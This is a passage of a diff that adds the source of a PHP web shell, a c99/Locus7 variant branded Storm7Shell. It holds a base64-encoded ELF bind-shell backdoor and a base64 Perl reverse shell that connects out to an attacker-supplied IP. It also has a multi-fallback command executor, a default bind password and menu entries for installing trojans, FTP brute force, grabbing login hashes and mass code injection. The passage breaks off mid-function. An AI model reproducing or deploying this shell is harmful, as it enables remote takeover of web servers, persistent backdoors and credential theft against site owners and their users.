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2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+//EoW
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+//Start Enumerate function
+//function ENUMERATE()
+
+// $hostname_x=php_uname(n);
+// $itshome = getcwd();
+// $itshome = str_replace("/home/","~",$itshome);
+// $itshome = str_replace("/public_html","/x2300.php",$itshome);
+// $enumerate = "http://".$hostname_x."/".$itshome."";
+
+//End Enumerate function
+
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.3.37"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "Storm7Shell v.".$shver.": access denied";
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server 
+$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server 
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>Locus7Shell modded by sToRm</b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ 'html'=>array('html','htm','shtml'),
+ 'txt'=>array('txt','conf','bat','sh','js','bak','doc','log','sfc','cfg','htaccess','passwd','shadow'),
+ 'exe'=>array('sh','install','bat','cmd'),
+ 'ini'=>array('ini','inf'),
+ 'code'=>array('php','phtml','php3','php4','inc','tcl','h','c','cpp','py','cgi','pl'),
+ 'img'=>array('gif','png','jpeg','jfif','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg'),
+ 'sdb'=>array('sdb'),
+ 'phpsess'=>array('sess'),
+ 'download'=>array('exe','com','pif','src','lnk','zip','rar','gz','tar')
+);
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,'r');
+   while(!feof($fp))
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,'<font color=red>','</font>'), // example 
+  array("config.php",1), // example 
+  array("settings.php",1),
+  array("connect.php",1)
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range('a','z'); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = 'c99';  // default password for binding 
+$bindport_port = '31373'; // default port for binding 
+$bc_port = '5992'; // default port for back-connect 
+$datapipe_localport = '8081'; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<br><br><center><b>[String/Hash Tools]</b>",$surl."act=encoder&d=%d"),
+ array("<b>[Tools]</b>",$surl."act=tools&d=%d"), 
+ array("<b>[Processes]</b>",$surl."act=processes&d=%d"), 
+ array("<b>[FTP Brute Force]</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>[System Information]</b>",$surl."act=security&d=%d"), 
+ array("<b>[SQL Shell]</b>",$surl."act=sql&d=%d"), 
+ array("<b>[Kernel Exploit Search]</b>",$millink),
+ array("<b>[Execute PHP Code]</b>",$surl."act=eval&d=%d"),
+ array("<b>[PHP Info]</b></center>",$surl."act=phpinfo&d=%d")
+);
+$quicklaunch2 = array(
+ array("<b><center>[Install Trojan/Backdoor]</b>",$surl.'act=trojan'),
+ array("<b>[Bind Shell Backdoor]</b>",$surl.'act=shbd'),
+ array("<b>[Back-Connection]</b>",$surl.'act=backc'),
+ array("<b>[Mass Code Injection]</b>",$surl.'act=massbrowsersploit'),
+ array("<b>[Exploits]</b>",$surl.'act=exploits'),
+ array("<b>[Grab Login Hashes]</b>",$surl.'act=grablogins'),
+ array("<b>[Suicide Script]</b></center>",$surl.'act=selfremove')
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+/*function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   {
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+}*/
+/*function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+}*/ 
+/*function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+}*/
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://locus7s.com/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
